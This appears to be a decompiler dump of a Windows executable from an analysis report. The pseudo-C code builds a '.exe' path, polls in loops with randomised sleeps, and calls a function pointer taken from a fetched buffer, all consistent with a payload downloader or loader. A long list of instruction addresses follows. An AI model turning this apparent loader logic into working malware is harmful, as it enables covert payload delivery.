															_t1739 =  &(1[_t1739]);
															_t1331 = _t1631;
															__eflags = _t1739 - 0x1000;
															if(_t1739 < 0x1000) {
																L97:
																_push(_t1739);
																E0040ED7F(_t1631);
																_t1854 = _t1854 + 8;
																goto L98;
															} else {
																_t1467 =  *((intOrPtr*)(_t1631 - 4));
																_t1677 = _t1739 + 0x23;
																__eflags = _t1331 -  *((intOrPtr*)(_t1631 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L347;
																} else {
																	goto L97;
																}
															}
														}
													} else {
														_t1632 = _v464;
														_t1789 =  &(_t1738->nLength);
														_t1335 = _t1632;
														__eflags = _t1789 - 0x1000;
														if(_t1789 < 0x1000) {
															L93:
															_push(_t1789);
															E0040ED7F(_t1632);
															_t1854 = _t1854 + 8;
															goto L94;
														} else {
															_t1467 =  *((intOrPtr*)(_t1632 - 4));
															_t1677 = _t1789 + 0x23;
															__eflags = _t1335 -  *((intOrPtr*)(_t1632 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L347;
															} else {
																goto L93;
															}
														}
													}
												} else {
													_t1633 = _v440;
													_t1790 =  &(_t1737->nLength);
													_t1339 = _t1633;
													__eflags = _t1790 - 0x1000;
													if(_t1790 < 0x1000) {
														L89:
														_push(_t1790);
														E0040ED7F(_t1633);
														_t1854 = _t1854 + 8;
														goto L90;
													} else {
														_t1467 =  *((intOrPtr*)(_t1633 - 4));
														_t1677 = _t1790 + 0x23;
														__eflags = _t1339 -  *((intOrPtr*)(_t1633 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L347;
														} else {
															goto L89;
														}
													}
												}
											} else {
												_push(_t1572);
												_t1351 = E0040C6F0( &_v464,  &_v408);
												_v28 = 5;
												_t1352 = E0040C910( &_v440, _t1351,  &_v360);
												_t1854 = _t1887 + 8;
												_t1637 = _t1352;
												_v28 = 6;
												_t1808 =  *(_t1637 + 0x14);
												_t1793 =  *(_t1637 + 0x10);
												__eflags = _t1808 - _t1793 - 4;
												if(_t1808 - _t1793 < 4) {
													_v412 = 0;
													_t1637 = E00402990(_t1409, _t1637, _t1808, _t1815, 4, _v412, ".exe", 4);
												} else {
													 *(_t1637 + 0x10) =  &(_t1793->lpSecurityDescriptor);
													_t1372 = _t1637;
													__eflags = _t1808 - 0x10;
													if(_t1808 >= 0x10) {
														_t1372 =  *_t1637;
													}
													 *((intOrPtr*)(_t1372 + _t1793)) = 0x6578652e;
													 *((char*)(_t1372 +  &(_t1793->lpSecurityDescriptor))) = 0;
												}
												 *_t1815 = 0;
												 *(_t1815 + 0x10) = 0;
												 *(_t1815 + 0x14) = 0;
												asm("movups xmm0, [ecx]");
												asm("movups [esi], xmm0");
												asm("movq xmm0, [ecx+0x10]");
												asm("movq [esi+0x10], xmm0");
												 *(_t1637 + 0x10) = 0;
												 *(_t1637 + 0x14) = 0xf;
												 *_t1637 = 0;
												_t1794 = _v420;
												__eflags = _t1794 - 0x10;
												if(_t1794 < 0x10) {
													L59:
													_t1795 = _v444;
													_v424 = 0;
													_v420 = 0xf;
													_v440 = 0;
													__eflags = _t1795 - 0x10;
													if(_t1795 < 0x10) {
														L63:
														_t1796 = _v340;
														_v448 = 0;
														_v444 = 0xf;
														_v464 = 0;
														__eflags = _t1796 - 0x10;
														if(_t1796 < 0x10) {
															L67:
															_t1797 = _v364;
															_v344 = 0;
															_v340 = 0xf;
															_v360 = 0;
															__eflags = _t1797 - 0x10;
															if(_t1797 < 0x10) {
																L71:
																_v368 = 0;
																_v364 = 0xf;
																_v384 = 0;
																L72:
																_t1677 = _v388;
																__eflags = _t1677 - 0x10;
																if(_t1677 < 0x10) {
																	L344:
																	 *[fs:0x0] = _v36;
																	_pop(_t1809);
																	_pop(_t1816);
																	__eflags = _v44 ^ _t1828;
																	return E0040EB3F(_t1815, _t1409, _v44 ^ _t1828, _t1677, _t1809, _t1816);
																} else {
																	_t1542 = _v408;
																	_t1677 =  &(1[_t1677]);
																	_t1066 = _t1542;
																	__eflags = _t1677 - 0x1000;
																	if(_t1677 < 0x1000) {
																		L307:
																		_push(_t1677);
																		E0040ED7F(_t1542);
																		goto L344;
																	} else {
																		_t1467 =  *((intOrPtr*)(_t1542 - 4));
																		_t1677 = _t1677 + 0x23;
																		__eflags = _t1066 -  *((intOrPtr*)(_t1542 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L346;
																		} else {
																			goto L307;
																		}
																	}
																}
															} else {
																_t1606 = _v384;
																_t1761 = _t1797 + 1;
																_t1356 = _t1606;
																__eflags = _t1761 - 0x1000;
																if(_t1761 < 0x1000) {
																	L70:
																	_push(_t1761);
																	E0040ED7F(_t1606);
																	_t1854 = _t1854 + 8;
																	goto L71;
																} else {
																	_t1467 =  *((intOrPtr*)(_t1606 - 4));
																	_t1677 = _t1761 + 0x23;
																	__eflags = _t1356 -  *((intOrPtr*)(_t1606 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L346;
																	} else {
																		goto L70;
																	}
																}
															}
														} else {
															_t1638 = _v360;
															_t1798 = _t1796 + 1;
															_t1359 = _t1638;
															__eflags = _t1798 - 0x1000;
															if(_t1798 < 0x1000) {
																L66:
																_push(_t1798);
																E0040ED7F(_t1638);
																_t1854 = _t1854 + 8;
																goto L67;
															} else {
																_t1467 =  *((intOrPtr*)(_t1638 - 4));
																_t1677 = _t1798 + 0x23;
																__eflags = _t1359 -  *((intOrPtr*)(_t1638 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L346;
																} else {
																	goto L66;
																}
															}
														}
													} else {
														_t1639 = _v464;
														_t1799 =  &(_t1795->nLength);
														_t1363 = _t1639;
														__eflags = _t1799 - 0x1000;
														if(_t1799 < 0x1000) {
															L62:
															_push(_t1799);
															E0040ED7F(_t1639);
															_t1854 = _t1854 + 8;
															goto L63;
														} else {
															_t1467 =  *((intOrPtr*)(_t1639 - 4));
															_t1677 = _t1799 + 0x23;
															__eflags = _t1363 -  *((intOrPtr*)(_t1639 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L346;
															} else {
																goto L62;
															}
														}
													}
												} else {
													_t1640 = _v440;
													_t1800 =  &(_t1794->nLength);
													_t1367 = _t1640;
													__eflags = _t1800 - 0x1000;
													if(_t1800 < 0x1000) {
														L58:
														_push(_t1800);
														E0040ED7F(_t1640);
														_t1854 = _t1854 + 8;
														goto L59;
													} else {
														_t1467 =  *((intOrPtr*)(_t1640 - 4));
														_t1677 = _t1800 + 0x23;
														__eflags = _t1367 -  *((intOrPtr*)(_t1640 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L346;
														} else {
															goto L58;
														}
													}
												}
											}
										} else {
											_t1641 = _v488;
											_t1733 = _t1733 + 1;
											_t1373 = _t1641;
											__eflags = _t1733 - 0x1000;
											if(_t1733 < 0x1000) {
												L48:
												_push(_t1733);
												E0040ED7F(_t1641);
												_t1854 = _t1854 + 8;
												goto L49;
											} else {
												_t1467 =  *((intOrPtr*)(_t1641 - 4));
												_t1677 = _t1733 + 0x23;
												__eflags = _t1373 -  *((intOrPtr*)(_t1641 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L345;
												} else {
													goto L48;
												}
											}
										}
									} else {
										_t1642 = _v440;
										_t1801 =  &(_t1732->nLength);
										_t1378 = _t1642;
										__eflags = _t1801 - 0x1000;
										if(_t1801 < 0x1000) {
											L44:
											_push(_t1801);
											E0040ED7F(_t1642);
											_t1854 = _t1854 + 8;
											goto L45;
										} else {
											_t1467 =  *((intOrPtr*)(_t1642 - 4));
											_t1677 = _t1801 + 0x23;
											__eflags = _t1378 -  *((intOrPtr*)(_t1642 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												L345:
												E004134A7(_t1409, _t1677, __eflags);
												L346:
												E004134A7(_t1409, _t1677, __eflags);
												L347:
												E004134A7(_t1409, _t1677, __eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t1828);
												_t1830 = _t1854;
												_push(0xffffffff);
												_push(0x42c9a7);
												_push( *[fs:0x0]);
												_t1862 = _t1854 - 0x4dc;
												_t947 =  *0x43d054; // 0x8e1b5714
												_t948 = _t947 ^ _t1830;
												_v628 = _t948;
												_push(_t1409);
												_push(_t1815);
												_push(_t1808);
												_push(_t948);
												 *[fs:0x0] =  &_v624;
												_v616 = 0;
												_t950 = E00405F40(_t1409, _t1808); // executed
												_t1411 = Sleep;
												__eflags = _t950;
												if(__eflags != 0) {
													_t1815 = 0x7d0;
													do {
														_t1036 = E00417D76(_t1467, __eflags);
														asm("cdq");
														_t1677 = _t1036 % 0x7d0 + 0x3e8;
														Sleep(_t1036 % 0x7d0 + 0x3e8);
														__eflags = E00405F40(Sleep, _t1808);
													} while (__eflags != 0);
												}
												E00401970(_t1411,  &_v772);
												_v32 = 1;
												_t954 = E00402520( &_v1164, E0040B840(E00409300(_t1677, _t1808, _t1815)));
												_v32 = 2;
												_t957 = E00402520( &_v1140, E0040B870(E00409270(_t1411, _t1677, _t954, _t1815)));
												_v32 = 3;
												L385();
												_t959 = E00402520( &_v1284, E0040B720(_t957));
												_v32 = 4;
												_t960 = E0040C8B0( &_v1260, 0x450de0, _t959);
												_v32 = 5;
												_t961 = E0040C910( &_v1236, _t960,  &_v20);
												_v32 = 6;
												_t962 = E0040C9C0( &_v1212, _t961, _t957);
												_v32 = 7;
												_t963 = E0040C9C0( &_v1188, _t962, _t954);
												_v32 = 8;
												E0040C910( &_v116, _t963, 0x450dc8);
												_t1868 = _t1862 - 0x14 + 0x14;
												E00402450(_t1411,  &_v1188);
												E00402450(_t1411,  &_v1212);
												E00402450(_t1411,  &_v1236);
												E00402450(_t1411,  &_v1260);
												E00402450(_t1411,  &_v1284);
												E00402450(_t1411,  &_v1140);
												_v32 = 0x10;
												E00402450(_t1411,  &_v1164);
												_t1818 = 0;
												__eflags = 0;
												_t1811 = 0xc8;
												while(1) {
													_t1818 =  &(1[_t1818]);
													_t972 = E00402410( &_v116);
													_t1489 =  &_v772;
													_t973 = E00402310(_t1411,  &_v772, _t1811, _t972); // executed
													__eflags = _t973;
													if(_t973 == 0) {
														goto L356;
													}
													E00402520( &_v68, E00402380( &_v772));
													_t1689 = "0";
													_t982 = E00402810( &_v68, "0");
													__eflags = _t982;
													if(_t982 == 0) {
														_t1689 = "1";
														_t1034 = E00402810( &_v68, "1");
														__eflags = _t1034;
														if(_t1034 == 0) {
															_t1489 =  &_v68;
															E00402450(_t1411,  &_v68);
															goto L356;
														}
													}
													E00402450(_t1411,  &_v68);
													E0040BAF0( &_v92);
													_t1869 = _t1868 - 0x14;
													_v32 = 0x11;
													E00401970(_t1411,  &_v1100);
													_v32 = 0x12;
													while(1) {
														_t988 = E00402520( &_v1140, E0040B7F0(E00409390(_t1411, _t1689, _t1811, _t1818)));
														_t1689 = 0x450df8;
														_v32 = 0x15;
														_t989 = E0040C8B0( &_v1164, 0x450df8, _t988);
														_t1869 = _t1869 + 4;
														_v32 = 0x16;
														_t991 = E00402310(_t1411,  &_v1100, _t1811, E00402410(_t989)); // executed
														_t1818 = _t991;
														E00402450(_t1411,  &_v1164);
														_v32 = 0x12;
														E00402450(_t1411,  &_v1140);
														__eflags = _t991;
														if(_t991 == 0) {
															goto L363;
														}
														E00402420( &_v92, E00402380( &_v1100));
														_t996 = E00402400( &_v92);
														__eflags = _t996 - 0xa;
														if(_t996 <= 0xa) {
															goto L363;
														}
														__eflags = _t996 - 0x64;
														if(_t996 >= 0x64) {
															goto L363;
														}
														_t1870 = _t1869 - 0x14;
														_t1819 = 0;
														__eflags = 0;
														E00401970(_t1411,  &_v444);
														_v32 = 0x17;
														do {
															_v1116 = _t1819 + 1;
															_t1000 = E00402520( &_v1140, E0040B820(E00409420()));
															_t1690 = 0x450df8;
															_v32 = 0x1a;
															_t1001 = E0040C8B0( &_v1164, 0x450df8, _t1000);
															_t1870 = _t1870 + 4;
															_v32 = 0x1b;
															_t1003 = E00402310(_t1411,  &_v444, _t1811, E00402410(_t1001)); // executed
															E00402450(_t1411,  &_v1164);
															_v32 = 0x17;
															E00402450(_t1411,  &_v1140);
															__eflags = _t1003;
															if(_t1003 == 0) {
																goto L368;
															} else {
																_t1411 = E00402390( &_v444);
																__eflags = _t1411 - 0x16;
																if(__eflags <= 0) {
																	goto L368;
																} else {
																	_push( ~(0 | __eflags > 0x00000000) |  &(1[_t1411]));
																	_t1018 = E0041626E();
																	_t824 =  &(1[_t1411]); // 0x1
																	_t1811 = _t1018;
																	_t1019 = E00402350( &_v444, _t1018, _t824);
																	_push( ~(0 | __eflags > 0x00000000) | _t1411 * 0x00000002); // executed
																	_t1022 = E0041626E(); // executed
																	_t1876 = _t1870 + 4 - 0x14;
																	_v1104 = _t1022;
																	E0040BB10(_t1411, _t1876, _t1411 * 2 >> 0x20, _t1018,  &_v92);
																	_push( &_v1104);
																	_t1026 = E00403770(_t1411, _t1018, _t1019, _t1811); // executed
																	_t1690 = _t1026;
																	_t1027 = E00402B70(_v1104, _t1026, __eflags,  &_v1112,  &_v1112); // executed
																	_t1870 = _t1876 + 0x24;
																	_v1108 = _t1027;
																	__eflags = _v1112;
																	if(_v1112 != 0) {
																		_t1811 = Sleep;
																		_t1819 = 0;
																		_v1104 = 0;
																		_t1411 = 0;
																		__eflags = 0;
																		do {
																			_t1532 = _v1108(E00402410(0x450e10), E00402410(0x450d98));
																			_t1870 = _t1870 + 8;
																			_t1031 = _v1104;
																			_t1690 = 1;
																			__eflags = _t1031;
																			if(_t1031 != 0) {
																				__eflags = _t1532;
																				_t1411 =  ==  ? 1 : _t1411 & 0x000000ff;
																			}
																			__eflags = _t1819 - 0xa;
																			if(_t1819 >= 0xa) {
																				__eflags = _t1532 - 1;
																				_t1411 =  !=  ? _t1690 : _t1411 & 0x000000ff;
																			}
																			__eflags = _t1819 - 0xf;
																			if(_t1819 < 0xf) {
																				__eflags = _t1819 - 5;
																				if(_t1819 < 5) {
																					goto L381;
																				} else {
																					goto L379;
																				}
																			} else {
																				__eflags = _t1532 - 1;
																				if(_t1532 == 1) {
																					_t1411 = _t1532;
																				}
																				L379:
																				__eflags = _t1031;
																				if(_t1031 != 0) {
																					goto L381;
																				} else {
																					__eflags = _t1532 - 0xfffffffe;
																					if(__eflags == 0) {
																						Sleep(0x7d0); // executed
																					} else {
																						goto L381;
																					}
																				}
																			}
																			goto L384;
																			L381:
																			__eflags = _t1532 - 1;
																			_t1033 =  ==  ? _t1690 : _t1031 & 0x000000ff;
																			_t1819 = _t1819 + 1;
																			_v1104 =  ==  ? _t1690 : _t1031 & 0x000000ff;
																			Sleep(0x7d0); // executed
																			__eflags = _t1411;
																		} while (__eflags == 0);
																	} else {
																		goto L368;
																	}
																}
															}
															L384:
															E004054C0(_t1411, __eflags); // executed
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t1830);
															_t1831 = _t1870;
															_t1007 =  *0x43d054; // 0x8e1b5714
															_v1844 = _t1007 ^ _t1831;
															_v1856 = 0x5e005d5b;
															_v1852 = 0x5d115e46;
															_v1848 = 0x2e13;
															_t1514 =  *( *[fs:0x2c]);
															_t1010 =  *0x450e84; // 0x80000017
															__eflags = _t1010 -  *((intOrPtr*)(_t1514 + 4));
															if(_t1010 >  *((intOrPtr*)(_t1514 + 4))) {
																E0040EEC8(_t1010, 0x450e84);
																__eflags =  *0x450e84 - 0xffffffff;
																if(__eflags == 0) {
																	asm("movaps xmm0, [0x439d40]");
																	asm("movups [0x450e60], xmm0");
																	asm("movq xmm0, [ebp-0x10]");
																	asm("movq [0x450e70], xmm0");
																	 *0x450e78 = _v40;
																	E0040F1DA(_t1514, __eflags, 0x42d400);
																	E0040EE7E(0x450e84);
																}
															}
															__eflags = _v36 ^ _t1831;
															return E0040EB3F(0x450e60, _t1411, _v36 ^ _t1831, _t1690, _t1811, _t1819);
															goto L389;
															L368:
															_t1819 = _v1116;
															__eflags = _t1819 - 0xa;
														} while (__eflags < 0);
														goto L384;
														L363:
														Sleep(0xbb8);
													}
													L356:
													__eflags = _t1818 - 0x12c;
													if(__eflags <= 0) {
														_t793 = _t1818 + 3; // 0x4
														Sleep(_t793 * 0x3e8);
													} else {
														_t976 = E00417D76(_t1489, __eflags);
														asm("cdq");
														Sleep((_t976 % _t1811 + 0x67) * 0x3e8);
													}
												}
											} else {
												goto L44;
											}
										}
									}
								}
							} else {
								goto L25;
							}
						}
					}
				}
				L389:
			}

0x00406800
0x00406800
0x00406800
0x00406800
0x00406801
0x00406809
0x00406810
0x00406814
0x00406816
0x00406818
0x00406823
0x00406824
0x00406825
0x00406828
0x00406829
0x00406830
0x00406834
0x0040683a
0x0040684a
0x0040684f
0x00406857
0x0040686a
0x00406871
0x00406879
0x00406883
0x00406888
0x0040688b
0x0040688d
0x00406891
0x00406896
0x0040689e
0x004068c4
0x004068d2
0x004068a0
0x004068a3
0x004068a6
0x004068ab
0x004068ad
0x004068ad
0x004068af
0x004068b6
0x004068b6
0x004068d4
0x004068df
0x004068e3
0x004068e8
0x004068ed
0x004068f4
0x004068fb
0x00406902
0x00406907
0x0040690c
0x0040690f
0x00406912
0x00406917
0x00406945
0x00406945
0x00406948
0x0040694f
0x00406956
0x0040695d
0x0040698b
0x0040698b
0x0040698e
0x00406995
0x0040699c
0x004069a3
0x004069d1
0x004069d1
0x004069d8
0x004069df
0x004069e3
0x004069e5
0x00000000
0x004069e7
0x004069f4
0x004069f9
0x004069fa
0x004069ff
0x00406a02
0x00406a02
0x00000000
0x004069a5
0x004069a5
0x004069a8
0x004069a9
0x004069b1
0x004069c7
0x004069c7
0x004069c9
0x004069ce
0x00000000
0x004069b3
0x004069b3
0x004069b6
0x004069c1
0x00000000
0x00000000
0x00000000
0x00000000
0x004069c1
0x004069b1
0x0040695f
0x0040695f
0x00406962
0x00406963
0x0040696b
0x00406981
0x00406981
0x00406983
0x00406988
0x00000000
0x0040696d
0x0040696d
0x00406970
0x0040697b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040697b
0x0040696b
0x00406919
0x00406919
0x0040691c
0x0040691d
0x00406925
0x0040693b
0x0040693b
0x0040693d
0x00406942
0x00000000
0x00406927
0x00406927
0x0040692a
0x00406935
0x00406a94
0x00406a94
0x00000000
0x00000000
0x00000000
0x00000000
0x00406935
0x00406925
0x00406a08
0x00406a08
0x00406a08
0x00406a0c
0x00406a0c
0x00406a12
0x00406a3c
0x00406a3c
0x00406a3f
0x00406a46
0x00406a4d
0x00406a54
0x00406a7e
0x00406a84
0x00406a93
0x00406a56
0x00406a56
0x00406a59
0x00406a5a
0x00406a62
0x00406a74
0x00406a74
0x00406a76
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a72
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a72
0x00406a62
0x00406a14
0x00406a14
0x00406a17
0x00406a18
0x00406a20
0x00406a32
0x00406a32
0x00406a34
0x00406a39
0x00000000
0x00406a22
0x00406a22
0x00406a22
0x00406a25
0x00406a30
0x00406a99
0x00406a99
0x00406a9e
0x00406a9f
0x00406aa0
0x00406aa1
0x00406aa9
0x00406aac
0x00406ab0
0x00406ab4
0x00406ab6
0x00406ab8
0x00406ac3
0x00406ac4
0x00406ac5
0x00406acb
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad6
0x00406ad7
0x00406adb
0x00406ae1
0x00406ae3
0x00406ae9
0x00406aef
0x00406af9
0x00406b03
0x00406b0d
0x00406b14
0x00406b1b
0x00406b20
0x00406b22
0x00407e4e
0x00407e53
0x00407e57
0x00407e5c
0x00407e6d
0x00407e72
0x00407e7c
0x00407e83
0x00407e85
0x00407e8a
0x00407e90
0x00407e97
0x00407e9c
0x00407e9f
0x00407ea6
0x00407ea8
0x00407eba
0x00407ec1
0x00407ec6
0x00407ed3
0x00407ed8
0x00407ed8
0x00407ea6
0x00407edb
0x00407ee0
0x00407ee2
0x00407ee4
0x00407eed
0x00407ef4
0x00407ef8
0x00407efd
0x00407efd
0x00407f04
0x00407f09
0x00407f13
0x00407f1d
0x00407f27
0x00407f2e
0x00407f2e
0x00407f31
0x00407f31
0x00407f33
0x00407f34
0x00407f34
0x00407f46
0x00407f4b
0x00407f4f
0x00407f57
0x00407f5f
0x00407f62
0x00407f92
0x00407fa7
0x00407f64
0x00407f64
0x00407f67
0x00407f6a
0x00407f76
0x00407f7d
0x00407f83
0x00407f83
0x00407fac
0x00407fb6
0x00407fc0
0x00407fca
0x00407fcd
0x00407fd4
0x00407fd9
0x00407fe1
0x00407fe8
0x00407fef
0x00407ff8
0x00408009
0x0040800e
0x00408018
0x0040801d
0x00408023
0x00408026
0x00408057
0x00408057
0x0040805b
0x00408061
0x0040806b
0x00408075
0x0040807c
0x0040807f
0x004080b0
0x004080b0
0x004080b4
0x004080ba
0x004080c4
0x004080ce
0x004080d5
0x004080d8
0x00408109
0x00408109
0x00408114
0x0040811b
0x00408120
0x00408123
0x0040812d
0x00408130
0x00408135
0x00408139
0x0040813e
0x00408141
0x00408143
0x00408356
0x0040835b
0x00408365
0x0040836f
0x00408379
0x00408382
0x00408389
0x0040838f
0x00408396
0x0040839b
0x0040839e
0x004083a5
0x004083ad
0x004083b5
0x004083c1
0x004083d2
0x004083da
0x004083df
0x004083ec
0x004083f1
0x004083f1
0x004083a5
0x004083f4
0x004083fb
0x004083fd
0x004083fd
0x00408400
0x00408400
0x00408407
0x00408408
0x00408408
0x00408400
0x0040840d
0x00408412
0x0040841c
0x00408426
0x00408430
0x00408437
0x00408437
0x0040843a
0x00408440
0x00408440
0x00408442
0x00408443
0x00408443
0x00408455
0x0040845a
0x0040845e
0x00408466
0x0040846e
0x00408471
0x004084a1
0x004084b6
0x00408473
0x00408473
0x00408476
0x00408479
0x00408485
0x0040848c
0x00408492
0x00408492
0x004084bb
0x004084c5
0x004084cf
0x004084d9
0x004084dc
0x004084e3
0x004084e8
0x004084f0
0x004084f7
0x004084fe
0x00408507
0x00408518
0x0040851d
0x00408527
0x0040852c
0x00408532
0x00408535
0x00408566
0x00408566
0x0040856a
0x00408570
0x0040857a
0x00408584
0x0040858b
0x0040858e
0x004085bf
0x004085bf
0x004085c3
0x004085c9
0x004085d3
0x004085dd
0x004085e4
0x004085e7
0x00408618
0x00408618
0x00408623
0x0040862a
0x0040862f
0x00408632
0x0040863c
0x0040863f
0x00408644
0x00408648
0x0040864d
0x00408650
0x00408652
0x00408878
0x0040887d
0x00408887
0x00408891
0x00408897
0x0040889e
0x004088a3
0x004088a6
0x004088ad
0x004088c0
0x004088c5
0x004088cb
0x004088d8
0x004088dd
0x004088dd
0x004088ad
0x004088e0
0x004088e5
0x004088e7
0x004088e9
0x004088f0
0x004088f7
0x004088fe
0x00408905
0x0040890c
0x00408913
0x0040891a
0x0040891a
0x0040891c
0x0040891c
0x00408921
0x00408926
0x00408930
0x0040893a
0x00408944
0x0040894b
0x0040894b
0x00408950
0x00408950
0x00408952
0x00408953
0x00408953
0x00408965
0x0040896a
0x0040896e
0x00408976
0x0040897e
0x00408981
0x004089b1
0x004089c6
0x00408983
0x00408983
0x00408986
0x00408989
0x00408995
0x0040899c
0x004089a2
0x004089a2
0x004089cb
0x004089d5
0x004089df
0x004089e9
0x004089ec
0x004089f3
0x004089f8
0x00408a00
0x00408a07
0x00408a0e
0x00408a17
0x00408a28
0x00408a2d
0x00408a37
0x00408a3c
0x00408a42
0x00408a45
0x00408a76
0x00408a76
0x00408a7a
0x00408a80
0x00408a8a
0x00408a94
0x00408a9b
0x00408a9e
0x00408acf
0x00408acf
0x00408ad3
0x00408ad9
0x00408ae3
0x00408aed
0x00408af4
0x00408af7
0x00408b28
0x00408b28
0x00408b33
0x00408b3a
0x00408b3f
0x00408b42
0x00408b4c
0x00408b4f
0x00408b54
0x00408b58
0x00408b5d
0x00408b60
0x00408b62
0x00408c9a
0x00408ca5
0x00408ca9
0x00000000
0x00408b68
0x00408b68
0x00408b75
0x00408b83
0x00408b90
0x00408b95
0x00408b98
0x00408b9a
0x00408b9e
0x00408ba3
0x00408ba8
0x00408bab
0x00408bd1
0x00408be5
0x00408bad
0x00408bb0
0x00408bb3
0x00408bb5
0x00408bb8
0x00408bba
0x00408bba
0x00408bbc
0x00408bc3
0x00408bc3
0x00408be7
0x00408bed
0x00408bf4
0x00408bfb
0x00408bfe
0x00408c01
0x00408c06
0x00408c0b
0x00408c12
0x00408c19
0x00408c1c
0x00408c22
0x00408c25
0x00408c56
0x00408c5c
0x00408c66
0x00408c70
0x00408c77
0x00408c82
0x00408c8d
0x00000000
0x00408c27
0x00408c27
0x00408c2d
0x00408c2e
0x00408c30
0x00408c36
0x00408c4c
0x00408c4c
0x00408c4e
0x00000000
0x00408c38
0x00408c38
0x00408c3b
0x00408c43
0x00408c46
0x00000000
0x00000000
0x00000000
0x00000000
0x00408c46
0x00408c36
0x00408c25
0x00408af9
0x00408af9
0x00408aff
0x00408b00
0x00408b02
0x00408b08
0x00408b1e
0x00408b1e
0x00408b20
0x00408b25
0x00000000
0x00408b0a
0x00408b0a
0x00408b0d
0x00408b15
0x00408b18
0x00000000
0x00000000
0x00000000
0x00000000
0x00408b18
0x00408b08
0x00408aa0
0x00408aa0
0x00408aa6
0x00408aa7
0x00408aa9
0x00408aaf
0x00408ac5
0x00408ac5
0x00408ac7
0x00408acc
0x00000000
0x00408ab1
0x00408ab1
0x00408ab4
0x00408abc
0x00408abf
0x00000000
0x00000000
0x00000000
0x00000000
0x00408abf
0x00408aaf
0x00408a47
0x00408a47
0x00408a4d
0x00408a4e
0x00408a50
0x00408a56
0x00408a6c
0x00408a6c
0x00408a6e
0x00408a73
0x00000000
0x00408a58
0x00408a58
0x00408a5b
0x00408a63
0x00408a66
0x00000000
0x00000000
0x00000000
0x00000000
0x00408a66
0x00408a56
0x00408658
0x00408658
0x00408665
0x00408673
0x00408680
0x00408685
0x00408688
0x0040868a
0x0040868e
0x00408693
0x00408698
0x0040869b
0x004086c1
0x004086d5
0x0040869d
0x004086a0
0x004086a3
0x004086a5
0x004086a8
0x004086aa
0x004086aa
0x004086ac
0x004086b3
0x004086b3
0x004086d7
0x004086dd
0x004086e4
0x004086eb
0x004086ee
0x004086f1
0x004086f6
0x004086fb
0x00408702
0x00408709
0x0040870c
0x00408712
0x00408715
0x00408746
0x00408746
0x0040874c
0x00408756
0x00408760
0x00408767
0x0040876a
0x0040879b
0x0040879b
0x004087a1
0x004087ab
0x004087b5
0x004087bc
0x004087bf
0x004087f0
0x004087f0
0x004087f6
0x00408800
0x0040880a
0x00408811
0x00408814
0x00000000
0x0040881a
0x0040881a
0x00408820
0x00408821
0x00408823
0x00408829
0x0040883f
0x0040883f
0x00408841
0x00408846
0x00408849
0x00408853
0x0040885d
0x00000000
0x0040882b
0x0040882b
0x0040882e
0x00408836
0x00408839
0x00000000
0x00000000
0x00000000
0x00000000
0x00408839
0x00408829
0x004087c1
0x004087c1
0x004087c7
0x004087c8
0x004087ca
0x004087d0
0x004087e6
0x004087e6
0x004087e8
0x004087ed
0x00000000
0x004087d2
0x004087d2
0x004087d5
0x004087dd
0x004087e0
0x00000000
0x00000000
0x00000000
0x00000000
0x004087e0
0x004087d0
0x0040876c
0x0040876c
0x00408772
0x00408773
0x00408775
0x0040877b
0x00408791
0x00408791
0x00408793
0x00408798
0x00000000
0x0040877d
0x0040877d
0x00408780
0x00408788
0x0040878b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040878b
0x0040877b
0x00408717
0x00408717
0x0040871d
0x0040871e
0x00408720
0x00408726
0x0040873c
0x0040873c
0x0040873e
0x00408743
0x00000000
0x00408728
0x00408728
0x0040872b
0x00408733
0x00408736
0x00000000
0x00000000
0x00000000
0x00000000
0x00408736
0x00408726
0x00408715
0x004085e9
0x004085e9
0x004085ef
0x004085f0
0x004085f2
0x004085f8
0x0040860e
0x0040860e
0x00408610
0x00408615
0x00000000
0x004085fa
0x004085fa
0x004085fd
0x00408605
0x00408608
0x00000000
0x00000000
0x00000000
0x00000000
0x00408608
0x004085f8
0x00408590
0x00408590
0x00408596
0x00408597
0x00408599
0x0040859f
0x004085b5
0x004085b5
0x004085b7
0x004085bc
0x00000000
0x004085a1
0x004085a1
0x004085a4
0x004085ac
0x004085af
0x00000000
0x00000000
0x00000000
0x00000000
0x004085af
0x0040859f
0x00408537
0x00408537
0x0040853d
0x0040853e
0x00408540
0x00408546
0x0040855c
0x0040855c
0x0040855e
0x00408563
0x00000000
0x00408548
0x00408548
0x0040854b
0x00408553
0x00408556
0x00000000
0x00000000
0x00000000
0x00000000
0x00408556
0x00408546
0x00408149
0x00408149
0x00408156
0x00408164
0x00408171
0x00408176
0x00408179
0x0040817b
0x0040817f
0x00408184
0x00408189
0x0040818c
0x004081b2
0x004081c6
0x0040818e
0x00408191
0x00408194
0x00408196
0x00408199
0x0040819b
0x0040819b
0x0040819d
0x004081a4
0x004081a4
0x004081c8
0x004081ce
0x004081d5
0x004081dc
0x004081df
0x004081e2
0x004081e7
0x004081ec
0x004081f3
0x004081fa
0x004081fd
0x00408203
0x00408206
0x00408237
0x00408237
0x0040823d
0x00408247
0x00408251
0x00408258
0x0040825b
0x0040828c
0x0040828c
0x00408292
0x0040829c
0x004082a6
0x004082ad
0x004082b0
0x004082e1
0x004082e1
0x004082e7
0x004082f1
0x004082fb
0x00408302
0x00408305
0x00408336
0x00408336
0x00408340
0x0040834a
0x00000000
0x00408307
0x00408307
0x0040830d
0x0040830e
0x00408310
0x00408316
0x0040832c
